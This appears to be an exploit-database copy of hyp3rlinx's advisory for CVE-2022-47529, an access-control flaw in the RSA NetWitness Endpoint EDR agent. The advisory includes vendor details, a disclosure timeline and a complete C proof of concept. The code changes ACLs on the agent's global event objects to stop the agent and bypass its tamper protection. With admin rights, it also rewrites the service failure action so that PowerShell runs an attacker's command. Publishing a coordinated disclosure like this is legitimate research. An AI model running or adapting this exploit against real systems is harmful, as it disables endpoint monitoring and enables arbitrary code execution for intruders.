扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 |
# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source:http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 pushrbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 testrcx, rcx .text:00000001400F7B1C jzshort loc_1400F7B5C .text:00000001400F7B1E callcs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h]; lpCriticalSection .text:00000001400F7B28 callcs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1; bManualReset .text:00000001400F7B33 xor r9d, r9d; lpName .text:00000001400F7B36 mov r8d, edx; bInitialState .text:00000001400F7B39 xor ecx, ecx; lpEventAttributes .text:00000001400F7B3B callcs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C testrax, rax .text:00000001400F7B4F jzshort loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 pushrbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 testrcx, rcx .text:00000001400F7B1C jzshort loc_1400F7B5C .text:00000001400F7B1E callcs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h]; lpCriticalSection .text:00000001400F7B28 callcs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1; bManualReset .text:00000001400F7B33 xor r9d, r9d; lpName .text:00000001400F7B36 mov r8d, edx; bInitialState .text:00000001400F7B39 xor ecx, ecx; lpEventAttributes .text:00000001400F7B3B callcs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C testrax, rax .text:00000001400F7B4F jzshort loc_1400F7B5C 1) Install "RSA NetWitness.msi"(Endpoint EDR Agent) 2) Run Exploit PoC as a Standard non-admin user, the PoC will: a) Open a handle (copy) to Ecat002 event. b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. c) Set/Reset event the Ecat002 handle. d) if admin privs change the EDR service configuration Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. */ char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; BOOL PWNED=FALSE; void Exploit(); int AdminChl(); void HijackSvcConfig(); int main(void){ printf("[+] RSA NetWitness EDR Agent 0Day\n"); printf("[+] CVE-2022-47529\n"); printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); printf("[+] ===================================\n"); Exploit(); if( AdminChk() ){ printf("[+] Hijacked NetWitness Agent Service!\n"); HijackSvcConfig(); } Sleep(2000); printf("[+] Done!\n\n"); system("pause"); return 0; } void Exploit(){ PACL pOldDACL = NULL; PACL pNewDACL = NULL; HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); int i=0; for(; i < sizeof(Vuln_Events) /sizeof(Vuln_Events[0]); i++){ HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); if(hEvent != INVALID_HANDLE_VALUE){ printf("[-] Targeting Event: %s\n", Vuln_Events[i]); Sleep(500); if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); } if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); }else{ SetEvent(hEvent_Ecat002); Sleep(1000); ResetEvent(hEvent_Ecat002); CloseHandle(hEvent_Ecat002); SetEvent(hEvent); Sleep(1000); PWNED=TRUE; } if(PWNED){ LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hEvent); } Sleep(1000); } } } } //If run as admin, modify the agent service config to run our own code. int AdminChk(){ int result = 0; HANDLE hToken = NULL; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ TOKEN_ELEVATION elevated; DWORD tokSize = sizeof(TOKEN_ELEVATION); if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ result = elevated.TokenIsElevated; } } if(hToken){ CloseHandle(hToken); } return result; } //Trivial example modify the service config... void HijackSvcConfig(){ Sleep(1000); WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); } [POC Video URL] https://www.youtube.com/watch?v=kO1fu4IOlSs [Disclosure Timeline] Vendor Notification: December 2, 2022 CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023 Fixed in v12.2.0.0 January 4, 2023 Restested for vendor: January 6, 2023 March 24, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx |
体验盒子
